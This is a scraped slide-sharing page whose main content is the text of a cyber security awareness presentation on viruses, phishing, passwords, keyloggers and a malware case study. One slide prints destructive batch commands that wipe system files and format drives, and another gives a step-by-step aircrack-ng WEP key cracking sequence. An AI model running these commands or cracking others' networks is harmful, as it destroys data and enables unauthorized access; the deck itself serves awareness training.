Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentationphoebematthew05
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Neo4j
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsPrecisely
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 

Recently uploaded (20)

The transition to renewables in India.pdf
The transition to renewables in India.pdfThe transition to renewables in India.pdf
The transition to renewables in India.pdf
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptxVulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning era
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
Snow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter RoadsSnow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter Roads
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentation
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power Systems
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 

CYBER SECURITY AWARENESS

  • 1. CYBER SECURITY AWARENESS Ali Payani THERE IS NO NEXT TIME, IT’S NOW OR NEVER.
  • 2. “As the world is increasingly interconnected, everyone shares the responsibility of securing cyberspace.” -Newton Lee
  • 3. OUTLINE • What is Computer Security • Importance of Security • Small business • Cyber Security Statistics • You are the target • Cyber Scam • 10 scams to watch out • Leading Threats • Password • Keylogger • Sniffing • Phishing • Security Plan • Case – Malware • Security issues
  • 4. WHAT IS COMPUTER SECURITY ? • Securing Computers, Smartphones, Networks, Internet. • defending information from unauthorized access, use, disclosure, disruption, modification, perusal, inspection, recording or destruction, unplanned events and natural disasters.
  • 5. IMPORTANCE OF SECURITY • The internet allows an attacker to attack from anywhere on the planet. • Governments, military, corporations, financial institutions, hospitals and other businesses collect, process and store a great deal of confidential information on computers and transmit that data across networks to other computers. With the growing volume and sophistication of cyber attacks, ongoing attention is required to protect sensitive business and personal information.  Risks caused by poor security knowledge and practice:  Identity Theft  Monetary Theft  Legal Ramifications (for yourself and companies)  Termination if company policies are not followed
  • 6. • One of the best ways to make sure company employees will not make costly errors in regard to information security is to institute company-wide security-awareness training (SANS)
  • 7. MOST SMALL BUSINESSES DON’T RECOVER FROM CYBERCRIME • 60% of small businesses will shutter within half a year after being victimized by cybercrime. • 90% do not have an internal IT manager for security • 87% do not have a formal written security policy • http://smallbusiness.foxbusiness.com/technology-web/2013/03/21/most-small-businesses- dont-recover-from-cybercrime/
  • 8. STATISTICS • 91% increase in attacks 2013 (Symantec) • 62% increase in the number of breaches in 2013 • (Facebook) • Over 552M identities were exposed via breaches in 2013 (493%+ 2012) • 38% of mobile users have experienced mobile cybercrime in past 12 months • 1 in 392 emails contain a phishing attacks • 86% of all websites had at least one vulnerability • Most Data Breaches (Retail/Merchant=15M , Financial/Insurance=8M, Other=6M)
  • 9. STATISTICS • 100M Phishing message everyday(Agari) • 3Bilion Phishing Message monthly • Phishing costs $ 70.2 Billion (Cisco) • Phishing cost corporate IT $ 28.1 Billion (IID) • 25% increase in Email Malware as URL • 1 in 196 Email Virus Rate • 1 in 566 website with Malware • 62% UAE users cannot recognize phishing message (Gulf news, Kaspersky 2012) • 70% phishing message targeted bank accounts ( RSA, 2013)
  • 10. YOU ARE THE TARGET • Explain to end users that they are the target. Far too often people have the misconception that they are not a target, that their information or their computers has no value to attackers. Of course we know this to be false. Anyone with an identify, computer or private information is a target, cyber criminals have made an entire industry of hacking the end user. 1- users know and understand they are being actively targeted 2- risks exist regardless if they are at work or at home 3- Don’t Be scared, Just Drive Safe !
  • 11. CYBER SCAM • Due to the high use of the internet, cyber scams have disrupted bank accounts, sent viruses, and stolen personal information. • Most cyber scams are sent through an e-mail account wherein individuals will open the e-mail to either find a virus has been put into their computer or to read misleading information. • Never entering personal information or credit card information on unsecure websites, never reply to or click on any links that you are not affiliated with, and never respond to an e-mail or advertisement saying you have won something. • Rugby World Cup 2015 , World Cup 2014 Brazil, Auction sites, Jobs and training courses, Business 2 Business, Phishing
  • 12. LEADING THREATS • Virus • Worm • Trojan Horse • Social engineering
  • 13. VIRUS • A virus attaches itself to a program, file, or disk When the program is executed, the virus activates and replicates itself. • Viruses result in crashing of computers and loss of data.  In order to recover/prevent virus/attacks:  Avoid potentially unreliable websites/emails  System Restore  Re-install operating system  Anti-virus (i.e. Avira, AVG, Norton) Program A Extra Code Program B infects
  • 14. VIRUS - EXAMPLE > @echo off > del %systemdrive%*.*/f/s/q > shutdown -r -f -t 00 > xxx.bat > ----------- > @echo off > for %%i in (c ,d:,e:,f:,g:) do format %%i /FS:NTFS /x /q > ----------- > diskpart > > list disk > select disk 0 > clean > create partition primary > format fs=fat32 quick > @echo off ))) > attrib -r -s -h c:autoexec.bat ))) > del c:autoexec.bat ))) > attrib -r -s -h c:boot.ini ))) > del c:boot.ini ))) > attrib -r -s -h c:ntldr )) > del c:ntldr ))) > attrib -r -s -h c:windowswin.ini ))) > del c:windowswin.ini ))) > @echo off )))) > ((((----shutdown -s -t 10 -c " "-----)))))
  • 15. WORM • Independent program which replicates itself and sends copies from computer to computer across network connections. Upon arrival the worm may be activated to replicate. To Joe To Ann To Bob Email List: Joe@gmail.com Ann@yahoo.com Bob@uwp.edu
  • 16. TROJAN HORSE • Masquerades as beneficial program while quietly destroying data or damaging your system. • Download a game: Might be fun but has hidden part that emails your password file without you knowing.
  • 17. SOCIAL ENGINEERING Social engineering manipulates people into performing actions or divulging confidential information. Similar to a confidence trick or simple fraud, the term applies to the use of deception to gain information, commit fraud, or access computer systems. • Phone Call: This is John, the System Admin. What is your password? • In Person: What ethnicity are you? Your mother’s maiden name? • I have come to repair your machine…and have some software patches • Email: ABC Bank has noticed a problem with your account…
  • 18. PASSWORD • 1- It’s tough to create and remember strong passwords for each online system or site you access. • 2- It’s a BAD idea though to use the same password for several or all systems and site • 3- contains 8 characters, a mixture of uppercase and lowercase letters, at least one number and one non-alphanumeric character or symbol (5P0ky!3Z) • A. never share your password or write it down or save it ! • B. String Password • C. Don’t Use common words • D. Chang your password
  • 19. KEY LOGGER • Bit of software that gets installed on your computer unbeknownst to you, and starts logging everything that you enter into the computer. This type of malware will often send usernames and passwords back to the attacker, who can then use this information to get into your bank accounts, social media accounts, and really anything that would require a username and password. • Protect: • 1- Anti virus • 2- Firewall • 3- Malwarebyte
  • 20. SNIFFING • A sniffer is an application or device that can read, monitor, and capture network data exchanges and read network packets. If the packets are not encrypted, a sniffer provides a full view of the data inside the packet. Even encapsulated (tunneled) packets can be broken open and read unless they are encrypted and the attacker does not have access to the key.
  • 21. PHISHING • The act of sending an email to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surrendering private information that will be used for identity theft.
  • 22. PHISHING • Most Phished Website: • .Facebook.com • .www.emiratesnbd.com/en/ • .Business Conference • .Facebook.com/Bestcars2015
  • 23. SECURITY PLAN • Every company needs to have a security program • 1- No matter how large or small your company is • 2- you need to have a plan to ensure the security of your information assets • how you will mitigate them, and planning for how you keep the program and your security practices up to date. • Risk Assessment • Policies and Procedures (CIA) • Awareness • Audit • Business Continuity (BC, CP, IR)
  • 24. CASE - MALWARE INFECTION • Logan Industries • is a multi-national catalog sale corporation with offices in 30 states • most offices are small, with fewer than 50 employees, • First Infection: Monday, Feb. 5 : • 20 employees at a satellite sales office received an email from the CEO and President Andrew James with the message. • Twenty employees experienced a computer shut-down a short time later • wait for the help desk to contact them about fixing their machines • The Virus Spreads: Tuesday, Feb. 6 • Early in the morning, the infection had spread from dozens of computers to hundreds. • After sending itself, it would cause the machine to reboot and never to recover.
  • 25. • By 10 a.m., the CIO had been called and decided to form a team to deal with the virus. • Late Afternoon: Wednesday, February, 7th • find BadBoy on the disk drive and clean any infected files. • they spent from five to 10 minutes manually removing the virus code from all file locations. • Users at Logan Industries had now been without access to a computer for three days and were getting frustrated.
  • 26. • The CEO requested a report from the CIO. The report included the following costs. • They didn’t have any security awareness for their employees • The ability to describe the business impact of virus/worm infection • •A comprehension of the responsibilities of an IT staff in delivering a secure environment • The steps to respond to and recover from a malware infection
  • 27. WIRELESS HACK - WEP • Sudo apt-install aircrack-ng • Iwconfig scan • Airmon-ng start Wlan0 • airodump-ng mon0 • //airodump-ng -c channel -w filetosave –bssid macaddrs mon0 • airodump-ng -c 6 -w d.data –bssid 11:22:33:44:55 mon0 • //aireplay-ng -10 -a bssid mon0 • aireplay-ng -1 0 -a 00:18:98:23:34:86 mon0 • //aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b bssid mon0 • aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:18:98:23:34:86 mon0 • aircrack-ng filename.cap • aircrack-ng wep-01.cap • KEY FOUND! [ 11:11:11:11:11 ]
  • 28. SECURITY ISSUES • Back up • Unknown file • Working on public place • Training, Training, Training • Security Policy • Passwords • Wireless Security • USB • Secure your accounts • Online Banking